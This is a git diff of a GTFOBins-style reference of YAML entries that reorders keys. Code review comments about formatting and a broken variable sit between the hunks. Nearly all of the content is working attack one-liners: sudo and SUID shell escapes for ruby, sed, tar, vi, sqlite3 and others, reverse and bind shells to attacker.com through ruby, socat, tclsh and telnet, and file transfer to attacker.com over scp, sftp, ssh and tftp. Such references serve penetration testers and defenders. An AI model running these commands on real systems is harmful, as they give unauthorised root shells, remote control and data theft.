- - code: ./rpmquery --eval '%{lua:posix.exec("/bin/sh", "-p")}'
+ - code: ./rpmquery --eval '%{lua:posix.exec("/bin/sh", "-p")}'
+ sudo-enabled:
+ - code: sudo rpmquery --eval '%{lua:posix.exec("/bin/sh")}'
 ---
diff --git a/_gtfobins/ruby.md b/_gtfobins/ruby.md
index 0c36e04..1039257 100644
--- a/_gtfobins/ruby.md
+++ b/_gtfobins/ruby.md
@@ -1,32 +1,33 @@
 ---
 functions:
 execute-interactive:
- - code: ruby -e 'exec "/bin/sh"'
- sudo-enabled:
- - code: sudo ruby -e 'exec "/bin/sh"'
- upload:
- - description: Serve files in the local folder running an HTTP server. This requires version 1.9.2 or later.
- code: |
- export LPORT=8888
- ruby -run -e httpd . -p $LPORT
- download:
- - description: Fetch a remote file via HTTP GET request.
- code: |
- export RHOST=attacker.com
- export RPORT=12345
- export RFILE=/file_to_get
- export LFILE=file_to_save
- ruby -e 'require "net/http"; Net::HTTP.start(ENV["RHOST"], ENV["RPORT"]) { |http| r = http.get(ENV["RFILE"]); open(ENV["LFILE"], "wb") { |file| file.write(r.body) } }'
+ - code: ruby -e 'exec "/bin/sh"'
 reverse-shell-interactive:
- - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
- code: |
- export RHOST=attacker.com
- export RPORT=12345
- ruby -rsocket -e 'exit if fork;c=TCPSocket.new(ENV["RHOST"],ENV["RPORT"]);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
- file-read:
- - code: ruby -e 'puts File.read("file_to_read")'
+ - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
+ code: |
+ export RHOST=attacker.com
+ export RPORT=12345
+ ruby -rsocket -e 'exit if fork;c=TCPSocket.new(ENV["RHOST"],ENV["RPORT"]);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
+ upload:
+ - description: Serve files in the local folder running an HTTP server. This requires
+ version 1.9.2 or later.
+ code: |
+ export LPORT=8888
+ ruby -run -e httpd . -p $LPORT
+ download:
+ - description: Fetch a remote file via HTTP GET request.
+ code: |
+ export RHOST=attacker.com
+ export RPORT=12345
+ export RFILE=/file_to_get
+ export LFILE=file_to_save
+ ruby -e 'require "net/http"; Net::HTTP.start(ENV["RHOST"], ENV["RPORT"]) { |http| r = http.get(ENV["RFILE"]); open(ENV["LFILE"], "wb") { |file| file.write(r.body) } }'
 file-write:
- - code: ruby -e 'File.open("file_to_write", "w+") { |f| f.write("data") }'
+ - code: ruby -e 'File.open("file_to_write", "w+") { |f| f.write("data") }'
+ file-read:
+ - code: ruby -e 'puts File.read("file_to_read")'
 load-library:
- - code: ruby -e 'require "fiddle"; Fiddle.dlopen("lib.so")'
+ - code: ruby -e 'require "fiddle"; Fiddle.dlopen("lib.so")'
+ sudo-enabled:
+ - code: sudo ruby -e 'exec "/bin/sh"'
 ---
diff --git a/_gtfobins/scp.md b/_gtfobins/scp.md
index 9cc7489..711cf53 100644
--- a/_gtfobins/scp.md
+++ b/_gtfobins/scp.md
@@ -1,36 +1,36 @@
 ---
 functions:
 execute-non-interactive:
- - code: |
- TF=$(mktemp)
- CMD="id"
- echo "$CMD" > "$TF"
- chmod +x "$TF"
- scp -S $TF x y:
- sudo-enabled:
- - code: |
- TF=$(mktemp)
- CMD="id"
- echo "$CMD" > "$TF"
- chmod +x "$TF"
- sudo scp -S $TF x y:
- suid-limited:
- - code: |
- TF=$(mktemp)
- CMD="id"
- echo "$CMD" > "$TF"
- chmod +x "$TF"
- ./scp -S $TF a b:
+ - code: |
+ TF=$(mktemp)
+ CMD="id"
+ echo "$CMD" > "$TF"
+ chmod +x "$TF"
+ scp -S $TF x y:
 upload:
- - description: Send local file to a SSH server.
- code: |
- RPATH=user@attacker.com:~/file_to_save
- LPATH=file_to_send
- scp $LFILE $RPATH
+ - description: Send local file to a SSH server.
+ code: |
+ RPATH=user@attacker.com:~/file_to_save
+ LPATH=file_to_send
+ scp $LFILE $RPATH
 download:
- - description: Fetch a remote file from a SSH server.
- code: |
- RPATH=user@attacker.com:~/file_to_get
- LFILE=file_to_save
- scp $RPATH $LFILE
+ - description: Fetch a remote file from a SSH server.
+ code: |
+ RPATH=user@attacker.com:~/file_to_get
+ LFILE=file_to_save
+ scp $RPATH $LFILE
+ sudo-enabled:
+ - code: |
+ TF=$(mktemp)
+ CMD="id"
+ echo "$CMD" > "$TF"
+ chmod +x "$TF"
+ sudo scp -S $TF x y:
+ suid-limited:
+ - code: |
+ TF=$(mktemp)
+ CMD="id"
+ echo "$CMD" > "$TF"
+ chmod +x "$TF"
+ ./scp -S $TF a b:
 ---
diff --git a/_gtfobins/sed.md b/_gtfobins/sed.md
index fca942b..0cd0df4 100644
--- a/_gtfobins/sed.md
+++ b/_gtfobins/sed.md
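Review bot: The upload entry assigns `LPATH=file_to_send` and then runs `scp $LFILE $RPATH`, so `$LFILE` is unset, expands to nothing, and scp is invoked with only the remote path; no file is sent. The reference should match the assignment: `scp $LPATH $RPATH`. The download entry below it is consistent (`LFILE` is both set and used), so only the upload block is affected. This predates the commit, which only reorders the keys, but the new side still carries it.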
@@ -1,24 +1,24 @@
 ---
 functions:
 execute-interactive:
- - description: GNU version only. Also, this requires `bash`.
- code: sed -n "1e bash -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" /etc/hosts
+ - description: GNU version only. Also, this requires `bash`.
+ code: sed -n "1e bash -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" /etc/hosts
 execute-non-interactive:
- - description: GNU version only.
- code: sed -n "1e id" /etc/hosts
- sudo-enabled:
- - description: GNU version only. Also, this requires `bash`.
- code: sudo sed -n "1e /bin/bash -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" /etc/hosts
- suid-enabled:
- - code: |
- LFILE=file_to_read
- ./sed -e '' "$LFILE"
- file-read:
- - code: |
- LFILE=file_to_read
- sed '' "$LFILE"
+ - description: GNU version only.
+ code: sed -n "1e id" /etc/hosts
 file-write:
- - code: |
- LFILE=file_to_write
- sed -n "1s/.*/data/w $LFILE" /etc/hosts
+ - code: |
+ LFILE=file_to_write
+ sed -n "1s/.*/data/w $LFILE" /etc/hosts
+ file-read:
+ - code: |
+ LFILE=file_to_read
+ sed '' "$LFILE"
+ suid-enabled:
+ - code: |
+ LFILE=file_to_read
+ ./sed -e '' "$LFILE"
+ sudo-enabled:
+ - description: GNU version only. Also, this requires `bash`.
+ code: sudo sed -n "1e /bin/bash -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" /etc/hosts
 ---
diff --git a/_gtfobins/setarch.md b/_gtfobins/setarch.md
index af80824..cdc0aed 100644
--- a/_gtfobins/setarch.md
+++ b/_gtfobins/setarch.md
@@ -1,9 +1,9 @@
 ---
 functions:
 execute-interactive:
- - code: setarch $(arch) /bin/sh
- sudo-enabled:
- - code: sudo setarch $(arch) /bin/sh
+ - code: setarch $(arch) /bin/sh
 suid-enabled:
- - code: ./setarch $(arch) /bin/sh -p
+ - code: "./setarch $(arch) /bin/sh -p"
+ sudo-enabled:
+ - code: sudo setarch $(arch) /bin/sh
 ---
diff --git a/_gtfobins/sftp.md b/_gtfobins/sftp.md
index 8c528e8..743b96f 100644
--- a/_gtfobins/sftp.md
+++ b/_gtfobins/sftp.md
@@ -1,25 +1,25 @@
 ---
 functions:
 execute-interactive:
- - code: |
- HOST=user@attacker.com
- sftp $HOST
- !/bin/sh
- sudo-enabled:
- - code: |
- HOST=user@attacker.com
- sudo sftp $HOST
- !/bin/sh
+ - code: |
+ HOST=user@attacker.com
+ sftp $HOST
+ !/bin/sh
 upload:
- - description: Send local file to a SSH server.
- code: |
- RHOST=user@attacker.com
- sftp $RHOST
- put file_to_send file_to_save
+ - description: Send local file to a SSH server.
+ code: |
+ RHOST=user@attacker.com
+ sftp $RHOST
+ put file_to_send file_to_save
 download:
- - description: Fetch a remote file from a SSH server.
- code: |
- RHOST=user@attacker.com
- sftp $RHOST
- get file_to_get file_to_save
+ - description: Fetch a remote file from a SSH server.
+ code: |
+ RHOST=user@attacker.com
+ sftp $RHOST
+ get file_to_get file_to_save
+ sudo-enabled:
+ - code: |
+ HOST=user@attacker.com
+ sudo sftp $HOST
+ !/bin/sh
 ---
diff --git a/_gtfobins/shuf.md b/_gtfobins/shuf.md
index 318fcd2..924ea0e 100644
--- a/_gtfobins/shuf.md
+++ b/_gtfobins/shuf.md
@@ -1,17 +1,17 @@
 ---
 description: The read file content is corrupted by adding a newline.
 functions:
- sudo-enabled:
- - code: |
- LFILE=file_to_write
- sudo shuf -e data -o "$LFILE"
- suid-enabled:
- - description:
- code: |
- LFILE=file_to_write
- ./shuf -e data -o "$LFILE"
 file-write:
- - code: |
- LFILE=file_to_write
- shuf -e data -o "$LFILE"
+ - code: |
+ LFILE=file_to_write
+ shuf -e data -o "$LFILE"
+ suid-enabled:
+ - description:
+ code: |
+ LFILE=file_to_write
+ ./shuf -e data -o "$LFILE"
+ sudo-enabled:
+ - code: |
+ LFILE=file_to_write
+ sudo shuf -e data -o "$LFILE"
 ---
diff --git a/_gtfobins/socat.md b/_gtfobins/socat.md
index 2e84b46..dc524ff 100644
--- a/_gtfobins/socat.md
+++ b/_gtfobins/socat.md
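Review bot: In the shuf.md hunk the suid-enabled entry keeps a bare `- description:` with no value, which YAML loads as null, so whatever renders the page gets an empty or literal `null` description for that entry. Either give it text or drop the line; since the file-level description already covers this case, removing `- description:` and starting the entry at `- code: |` is enough. The sibling file-write and sudo-enabled entries in the same hunk have no description key, so dropping it also makes the three entries consistent.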
@@ -1,14 +1,16 @@
 ---
 functions:
 reverse-shell-interactive:
- - description: Run socat file:`tty`,raw,echo=0 tcp-listen:12345 on the attacker box to receive the shell.
- code: |
- RHOST=attacker.com
- RPORT=12345
- socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane
+ - description: Run socat file:`tty`,raw,echo=0 tcp-listen:12345 on
+ the attacker box to receive the shell.
+ code: |
+ RHOST=attacker.com
+ RPORT=12345
+ socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane
 bind-shell-interactive:
- - description: Run socat FILE:`tty`,raw,echo=0 TCP:target.com:12345 on the attacker box to connect to the shell.
- code: |
- LPORT=12345
- socat TCP-LISTEN:$LPORT,reuseaddr,fork EXEC:sh,pty,stderr,setsid,sigint,sane
+ - description: Run socat FILE:`tty`,raw,echo=0 TCP:target.com:12345
+ on the attacker box to connect to the shell.
+ code: |
+ LPORT=12345
+ socat TCP-LISTEN:$LPORT,reuseaddr,fork EXEC:sh,pty,stderr,setsid,sigint,sane
 ---
diff --git a/_gtfobins/sort.md b/_gtfobins/sort.md
index 528d912..42f8b2c 100644
--- a/_gtfobins/sort.md
+++ b/_gtfobins/sort.md
@@ -1,15 +1,15 @@
 ---
 functions:
- sudo-enabled:
- - code: |
- LFILE=file_to_read
- sudo sort -m "$LFILE"
- suid-enabled:
- - code: |
- LFILE=file_to_read
- ./sort -m "$LFILE"
 file-read:
- - code: |
- LFILE=file_to_read
- sort -m "$LFILE"
+ - code: |
+ LFILE=file_to_read
+ sort -m "$LFILE"
+ suid-enabled:
+ - code: |
+ LFILE=file_to_read
+ ./sort -m "$LFILE"
+ sudo-enabled:
+ - code: |
+ LFILE=file_to_read
+ sudo sort -m "$LFILE"
 ---
diff --git a/_gtfobins/sqlite3.md b/_gtfobins/sqlite3.md
index f9ad23f..5b4f1f2 100644
--- a/_gtfobins/sqlite3.md
+++ b/_gtfobins/sqlite3.md
@@ -1,21 +1,21 @@
 ---
 functions:
 execute-interactive:
- - code: sqlite3 /dev/null '.shell /bin/sh'
- sudo-enabled:
- - code: sudo sqlite3 /dev/null '.shell /bin/sh'
- suid-limited:
- - code: ./sqlite3 /dev/null '.shell /bin/sh'
+ - code: sqlite3 /dev/null '.shell /bin/sh'
 file-write:
- - code: |
- LFILE=file_to_write
- sqlite3 /dev/null -cmd ".output $LFILE" 'select "data";'
+ - code: |
+ LFILE=file_to_write
+ sqlite3 /dev/null -cmd ".output $LFILE" 'select "data";'
 file-read:
- - code: |
- LFILE=file_to_read
- sqlite3 << EOF
- CREATE TABLE t(line TEXT);
- .import $LFILE t
- SELECT * FROM t;
- EOF
+ - code: |
+ LFILE=file_to_read
+ sqlite3 << EOF
+ CREATE TABLE t(line TEXT);
+ .import $LFILE t
+ SELECT * FROM t;
+ EOF
+ sudo-enabled:
+ - code: sudo sqlite3 /dev/null '.shell /bin/sh'
+ suid-limited:
+ - code: "./sqlite3 /dev/null '.shell /bin/sh'"
 ---
diff --git a/_gtfobins/ssh.md b/_gtfobins/ssh.md
index 71c5e10..bd3a290 100644
--- a/_gtfobins/ssh.md
+++ b/_gtfobins/ssh.md
@@ -1,30 +1,32 @@
 ---
 functions:
 execute-interactive:
- - description: Reconnecting may help bypassing restricted shells.
- code: ssh localhost $SHELL --noprofile --norc
- - description: Spawn interactive shell through ProxyCommand option.
- code: ssh -o ProxyCommand="/bin/sh -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" x
- sudo-enabled:
- - description: Spawn interactive root shell through ProxyCommand option.
- code: sudo ssh -o ProxyCommand="/bin/sh -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" x
- download:
- - description: Fetch a remote file from a SSH server.
- code: |
- HOST=user@attacker.com
- RPATH=file_to_get
- LPATH=file_to_save
- ssh $HOST "cat $RPATH" > $LPATH
+ - description: Reconnecting may help bypassing restricted shells.
+ code: ssh localhost $SHELL --noprofile --norc
+ - description: Spawn interactive shell through ProxyCommand option.
+ code: ssh -o ProxyCommand="/bin/sh -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'"
+ x
 upload:
- - description: Send local file to a SSH server.
- code: |
- HOST=user@attacker.com
- RPATH=file_to_save
- LPATH=file_to_send
- ssh $HOST "cat > $RPATH" < $LPATH
+ - description: Send local file to a SSH server.
+ code: |
+ HOST=user@attacker.com
+ RPATH=file_to_save
+ LPATH=file_to_send
+ ssh $HOST "cat > $RPATH" < $LPATH
+ download:
+ - description: Fetch a remote file from a SSH server.
+ code: |
+ HOST=user@attacker.com
+ RPATH=file_to_get
+ LPATH=file_to_save
+ ssh $HOST "cat $RPATH" > $LPATH
 file-read:
- - description: The read file content is corrupted by error prints.
- code: |
- LFILE=file_to_read
- ssh -F $LFILE localhost
+ - description: The read file content is corrupted by error prints.
+ code: |
+ LFILE=file_to_read
+ ssh -F $LFILE localhost
+ sudo-enabled:
+ - description: Spawn interactive root shell through ProxyCommand option.
+ code: sudo ssh -o ProxyCommand="/bin/sh -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh
+ -i'" x
 ---
diff --git a/_gtfobins/stdbuf.md b/_gtfobins/stdbuf.md
index 222d68b..c0e4181 100644
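Review bot: The plain-scalar wrapping in the new sudo-enabled entry splits the command inside the quoted ProxyCommand string, leaving `/bin/sh` on one line and `-i'" x` on the next, and the execute-interactive entry likewise leaves a lone `x` as a continuation line; YAML folds these back into one line, so the loaded value is unchanged, but anyone editing the file by hand can now change what the shell receives without noticing. Emitting these two entries with a block scalar, `code: |` followed by the full command on a single line, keeps the command readable and copy-pasteable. The wrapped descriptions elsewhere in the commit are prose and do not have this problem.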
--- a/_gtfobins/stdbuf.md
+++ b/_gtfobins/stdbuf.md
@@ -1,9 +1,9 @@
 ---
 functions:
 execute-interactive:
- - code: stdbuf -i0 /bin/sh
- sudo-enabled:
- - code: sudo stdbuf -i0 /bin/sh
+ - code: stdbuf -i0 /bin/sh
 suid-enabled:
- - code: ./stdbuf -i0 /bin/sh -p
+ - code: "./stdbuf -i0 /bin/sh -p"
+ sudo-enabled:
+ - code: sudo stdbuf -i0 /bin/sh
 ---
diff --git a/_gtfobins/strace.md b/_gtfobins/strace.md
index 61374f4..2302f19 100644
--- a/_gtfobins/strace.md
+++ b/_gtfobins/strace.md
@@ -1,9 +1,9 @@
 ---
 functions:
 execute-interactive:
- - code: strace -o /dev/null /bin/sh
- sudo-enabled:
- - code: sudo strace -o /dev/null /bin/sh
+ - code: strace -o /dev/null /bin/sh
 suid-enabled:
- - code: ./strace -o /dev/null /bin/sh -p
+ - code: "./strace -o /dev/null /bin/sh -p"
+ sudo-enabled:
+ - code: sudo strace -o /dev/null /bin/sh
 ---
diff --git a/_gtfobins/tail.md b/_gtfobins/tail.md
index 73d0c97..f7090f1 100644
--- a/_gtfobins/tail.md
+++ b/_gtfobins/tail.md
@@ -1,15 +1,15 @@
 ---
 functions:
- sudo-enabled:
- - code: |
- LFILE=file_to_read
- sudo tail -c1G "$LFILE"
- suid-enabled:
- - code: |
- LFILE=file_to_read
- ./tail -c1G "$LFILE"
 file-read:
- - code: |
- LFILE=file_to_read
- tail -c1G "$LFILE"
+ - code: |
+ LFILE=file_to_read
+ tail -c1G "$LFILE"
+ suid-enabled:
+ - code: |
+ LFILE=file_to_read
+ ./tail -c1G "$LFILE"
+ sudo-enabled:
+ - code: |
+ LFILE=file_to_read
+ sudo tail -c1G "$LFILE"
 ---
diff --git a/_gtfobins/tar.md b/_gtfobins/tar.md
index 19fd34d..01afeef 100644
--- a/_gtfobins/tar.md
+++ b/_gtfobins/tar.md
@@ -1,24 +1,24 @@
 ---
 functions:
 execute-interactive:
- - code: tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
+ - code: tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
 execute-non-interactive:
- - description: This only works for GNU tar.
- code: tar xf /dev/null -I '/bin/sh -c "id 1>&2"'
- sudo-enabled:
- - code: sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
- suid-limited:
- - code: ./tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
+ - description: This only works for GNU tar.
+ code: tar xf /dev/null -I '/bin/sh -c "id 1>&2"'
 file-write:
- - description: This only works for GNU tar.
- code: |
- LFILE=file_to_write
- TF=$(mktemp)
- echo data > "$TF"
- tar c --xform "s@.*@$LFILE@" -OP "$TF" | tar x -P
+ - description: This only works for GNU tar.
+ code: |
+ LFILE=file_to_write
+ TF=$(mktemp)
+ echo data > "$TF"
+ tar c --xform "s@.*@$LFILE@" -OP "$TF" | tar x -P
 file-read:
- - description: This only works for GNU tar.
- code: |
- LFILE=file_to_read
- tar xf "$LFILE" -I '/bin/sh -c "cat 1>&2"'
+ - description: This only works for GNU tar.
+ code: |
+ LFILE=file_to_read
+ tar xf "$LFILE" -I '/bin/sh -c "cat 1>&2"'
+ sudo-enabled:
+ - code: sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
+ suid-limited:
+ - code: "./tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh"
 ---
diff --git a/_gtfobins/taskset.md b/_gtfobins/taskset.md
index 78630bb..7c90197 100644
--- a/_gtfobins/taskset.md
+++ b/_gtfobins/taskset.md
@@ -1,9 +1,9 @@
 ---
 functions:
 execute-interactive:
- - code: taskset 1 /bin/sh
- sudo-enabled:
- - code: sudo taskset 1 /bin/sh
+ - code: taskset 1 /bin/sh
 suid-enabled:
- - code: ./taskset 1 /bin/sh -p
+ - code: "./taskset 1 /bin/sh -p"
+ sudo-enabled:
+ - code: sudo taskset 1 /bin/sh
 ---
diff --git a/_gtfobins/tclsh.md b/_gtfobins/tclsh.md
index f233314..582cd12 100644
--- a/_gtfobins/tclsh.md
+++ b/_gtfobins/tclsh.md
@@ -1,21 +1,21 @@
 ---
 functions:
 execute-interactive:
- - code: |
- tclsh
- exec /bin/sh <@stdin >@stdout 2>@stderr
- sudo-enabled:
- - code: |
- sudo tclsh
- exec /bin/sh <@stdin >@stdout 2>@stderr
- suid-enabled:
- - code: |
- ./tclsh
- exec /bin/sh -p <@stdin >@stdout 2>@stderr
+ - code: |
+ tclsh
+ exec /bin/sh <@stdin >@stdout 2>@stderr
 reverse-shell-non-interactive:
- - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
- code: |
- export RHOST=attacker.com
- export RPORT=12345
- echo 'set s [socket $::env(RHOST) $::env(RPORT)];while 1 { puts -nonewline $s "> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | tclsh
+ - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
+ code: |
+ export RHOST=attacker.com
+ export RPORT=12345
+ echo 'set s [socket $::env(RHOST) $::env(RPORT)];while 1 { puts -nonewline $s "> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | tclsh
+ suid-enabled:
+ - code: |
+ ./tclsh
+ exec /bin/sh -p <@stdin >@stdout 2>@stderr
+ sudo-enabled:
+ - code: |
+ sudo tclsh
+ exec /bin/sh <@stdin >@stdout 2>@stderr
 ---
diff --git a/_gtfobins/tee.md b/_gtfobins/tee.md
index 51b3558..a10c8c7 100644
--- a/_gtfobins/tee.md
+++ b/_gtfobins/tee.md
@@ -1,17 +1,18 @@
 ---
-description: |
- It can only append data if the destination exists.
+description: 'It can only append data if the destination exists.
+
+'
 functions:
- sudo-enabled:
- - code: |
- LFILE=file_to_write
- echo data | sudo tee -a "$LFILE"
- suid-enabled:
- - code: |
- LFILE=file_to_write
- echo data | ./tee -a "$LFILE"
 file-write:
- - code: |
- LFILE=file_to_write
- echo data | ./tee -a "$LFILE"
+ - code: |
+ LFILE=file_to_write
+ echo data | ./tee -a "$LFILE"
+ suid-enabled:
+ - code: |
+ LFILE=file_to_write
+ echo data | ./tee -a "$LFILE"
+ sudo-enabled:
+ - code: |
+ LFILE=file_to_write
+ echo data | sudo tee -a "$LFILE"
 ---
diff --git a/_gtfobins/telnet.md b/_gtfobins/telnet.md
index 80946c8..e237c64 100644
--- a/_gtfobins/telnet.md
+++ b/_gtfobins/telnet.md
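Review bot: The `file-write` entry in the tee hunk still runs `./tee -a "$LFILE"`, which looks like a copy of the `suid-enabled` entry; every other file-read/file-write entry in this commit (ul, unexpand, uniq, xxd) invokes the plain binary name, so this one should read `echo data | tee -a "$LFILE"`. This predates the commit but is carried over unchanged on the new side. Separately, the `description` block scalar has been re-emitted as `'It can only append data if the destination exists.` followed by an empty line and a lone `'`; it parses to the same string, but `description: |` was far more readable, and the uniq and vi hunks further down and the `\n`-escaped whois description have the same dumper artefact.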
@@ -1,36 +1,35 @@
 ---
 functions:
 execute-interactive:
- - description: BSD version only. Needs to be connected first.
- code: |
- RHOST=attacker.com
- RPORT=12345
- telnet $RHOST $RPORT
- ^]
- !/bin/sh
+ - description: BSD version only. Needs to be connected first.
+ code: |
+ RHOST=attacker.com
+ RPORT=12345
+ telnet $RHOST $RPORT
+ ^]
+ !/bin/sh
 reverse-shell-interactive:
- - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
- code: |
- RHOST=attacker.com
- RPORT=12345
- TF=$(mktemp)
- rm $TF
- mkfifo $TF && telnet $RHOST $RPORT 0<$TF | /bin/sh 1>$TF
+ - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
+ code: |
+ RHOST=attacker.com
+ RPORT=12345
+ TF=$(mktemp)
+ rm $TF
+ mkfifo $TF && telnet $RHOST $RPORT 0<$TF | /bin/sh 1>$TF
 sudo-enabled:
- - description: BSD version only. Needs to be connected first.
- code: |
- RHOST=attacker.com
- RPORT=12345
- sudo telnet $RHOST $RPORT
- ^]
- !/bin/sh
+ - description: BSD version only. Needs to be connected first.
+ code: |
+ RHOST=attacker.com
+ RPORT=12345
+ sudo telnet $RHOST $RPORT
+ ^]
+ !/bin/sh
 suid-limited:
- - description: BSD version only. Needs to be connected first.
- code: |
- RHOST=attacker.com
- RPORT=12345
- ./telnet $RHOST $RPORT
- ^]
- !/bin/sh
-
+ - description: BSD version only. Needs to be connected first.
+ code: |
+ RHOST=attacker.com
+ RPORT=12345
+ ./telnet $RHOST $RPORT
+ ^]
+ !/bin/sh
 ---
diff --git a/_gtfobins/tftp.md b/_gtfobins/tftp.md
index f391860..173edd6 100644
--- a/_gtfobins/tftp.md
+++ b/_gtfobins/tftp.md
@@ -1,15 +1,15 @@
 ---
 functions:
 upload:
- - description: Send local file to a TFTP server.
- code: |
- RHOST=attacker.com
- tftp $RHOST
- put file_to_send
+ - description: Send local file to a TFTP server.
+ code: |
+ RHOST=attacker.com
+ tftp $RHOST
+ put file_to_send
 download:
- - description: Fetch a remote file from a TFTP server.
- code: |
- RHOST=attacker.com
- tftp $RHOST
- get file_to_get
+ - description: Fetch a remote file from a TFTP server.
+ code: |
+ RHOST=attacker.com
+ tftp $RHOST
+ get file_to_get
 ---
diff --git a/_gtfobins/time.md b/_gtfobins/time.md
index 91c6290..97c4be1 100644
--- a/_gtfobins/time.md
+++ b/_gtfobins/time.md
@@ -4,9 +4,9 @@ description: |
 behave differently than` /usr/bin/time`, hence the absolute path.
 functions:
 execute-interactive:
- - code: /usr/bin/time /bin/sh
- sudo-enabled:
- - code: sudo /usr/bin/time /bin/sh
+ - code: "/usr/bin/time /bin/sh"
 suid-enabled:
- - code: ./time /bin/sh -p
+ - code: "./time /bin/sh -p"
+ sudo-enabled:
+ - code: sudo /usr/bin/time /bin/sh
 ---
diff --git a/_gtfobins/timeout.md b/_gtfobins/timeout.md
index fa50e90..6a4742a 100644
--- a/_gtfobins/timeout.md
+++ b/_gtfobins/timeout.md
@@ -1,9 +1,9 @@
 ---
 functions:
 execute-interactive:
- - code: timeout 7d /bin/sh
- sudo-enabled:
- - code: sudo timeout --foreground 7d /bin/sh
+ - code: timeout 7d /bin/sh
 suid-enabled:
- - code: ./timeout 7d /bin/sh -p
+ - code: "./timeout 7d /bin/sh -p"
+ sudo-enabled:
+ - code: sudo timeout --foreground 7d /bin/sh
 ---
diff --git a/_gtfobins/ul.md b/_gtfobins/ul.md
index 014d734..6da459d 100644
--- a/_gtfobins/ul.md
+++ b/_gtfobins/ul.md
@@ -3,16 +3,16 @@ description: |
 The read file content is corrupted by replacing occurrences of `$'\b_'` to terminal sequences and by converting tabs to spaces.
 functions:
- sudo-enabled:
- - code: |
- LFILE=file_to_read
- sudo ul "$LFILE"
- suid-enabled:
- - code: |
- LFILE=file_to_read
- ./ul "$LFILE"
 file-read:
- - code: |
- LFILE=file_to_read
- ul "$LFILE"
+ - code: |
+ LFILE=file_to_read
+ ul "$LFILE"
+ suid-enabled:
+ - code: |
+ LFILE=file_to_read
+ ./ul "$LFILE"
+ sudo-enabled:
+ - code: |
+ LFILE=file_to_read
+ sudo ul "$LFILE"
 ---
diff --git a/_gtfobins/unexpand.md b/_gtfobins/unexpand.md
index 886d27f..601ea73 100644
--- a/_gtfobins/unexpand.md
+++ b/_gtfobins/unexpand.md
@@ -1,15 +1,15 @@
 ---
 functions:
- sudo-enabled:
- - code: |
- LFILE=file_to_read
- sudo unexpand -t99999999 "$LFILE"
- suid-enabled:
- - code: |
- LFILE=file_to_read
- ./unexpand -t99999999 "$LFILE"
 file-read:
- - code: |
- LFILE=file_to_read
- unexpand -t99999999 "$LFILE"
+ - code: |
+ LFILE=file_to_read
+ unexpand -t99999999 "$LFILE"
+ suid-enabled:
+ - code: |
+ LFILE=file_to_read
+ ./unexpand -t99999999 "$LFILE"
+ sudo-enabled:
+ - code: |
+ LFILE=file_to_read
+ sudo unexpand -t99999999 "$LFILE"
 ---
diff --git a/_gtfobins/uniq.md b/_gtfobins/uniq.md
index b8b09f8..d2208d6 100644
--- a/_gtfobins/uniq.md
+++ b/_gtfobins/uniq.md
@@ -1,17 +1,18 @@
 ---
-description: |
- The read file content is corrupted by squashing multiple adjacent lines.
+description: 'The read file content is corrupted by squashing multiple adjacent lines.
+
+'
 functions:
- sudo-enabled:
- - code: |
- LFILE=file_to_read
- sudo uniq "$LFILE"
- suid-enabled:
- - code: |
- LFILE=file_to_read
- ./uniq "$LFILE"
 file-read:
- - code: |
- LFILE=file_to_read
- uniq "$LFILE"
+ - code: |
+ LFILE=file_to_read
+ uniq "$LFILE"
+ suid-enabled:
+ - code: |
+ LFILE=file_to_read
+ ./uniq "$LFILE"
+ sudo-enabled:
+ - code: |
+ LFILE=file_to_read
+ sudo uniq "$LFILE"
 ---
diff --git a/_gtfobins/unshare.md b/_gtfobins/unshare.md
index 412774b..222cac2 100644
--- a/_gtfobins/unshare.md
+++ b/_gtfobins/unshare.md
@@ -1,9 +1,9 @@
 ---
 functions:
 execute-interactive:
- - code: unshare /bin/sh
- sudo-enabled:
- - code: sudo unshare /bin/sh
+ - code: unshare /bin/sh
 suid-enabled:
- - code: ./unshare -r /bin/sh
+ - code: "./unshare -r /bin/sh"
+ sudo-enabled:
+ - code: sudo unshare /bin/sh
 ---
diff --git a/_gtfobins/vi.md b/_gtfobins/vi.md
index 43ff1da..a6849d1 100644
--- a/_gtfobins/vi.md
+++ b/_gtfobins/vi.md
@@ -1,20 +1,21 @@
 ---
 functions:
 execute-interactive:
- - code: vi -c ':!/bin/sh'
- - code: |
- vi
- :set shell=/bin/sh
- :shell
- sudo-enabled:
- - code: sudo vi -c ':!/bin/sh'
- suid-enabled:
- - code: ./vi -c ':!/bin/sh -p'
- file-read:
- - code: |
- vi file_to_read
+ - code: vi -c ':!/bin/sh'
+ - code: |
+ vi
+ :set shell=/bin/sh
+ :shell
 file-write:
- - code: |
- vi file_to_write
- w
+ - code: |
+ vi file_to_write
+ w
+ file-read:
+ - code: 'vi file_to_read
+
+'
+ suid-enabled:
+ - code: "./vi -c ':!/bin/sh -p'"
+ sudo-enabled:
+ - code: sudo vi -c ':!/bin/sh'
 ---
diff --git a/_gtfobins/watch.md b/_gtfobins/watch.md
index ef24de0..dc8fd22 100644
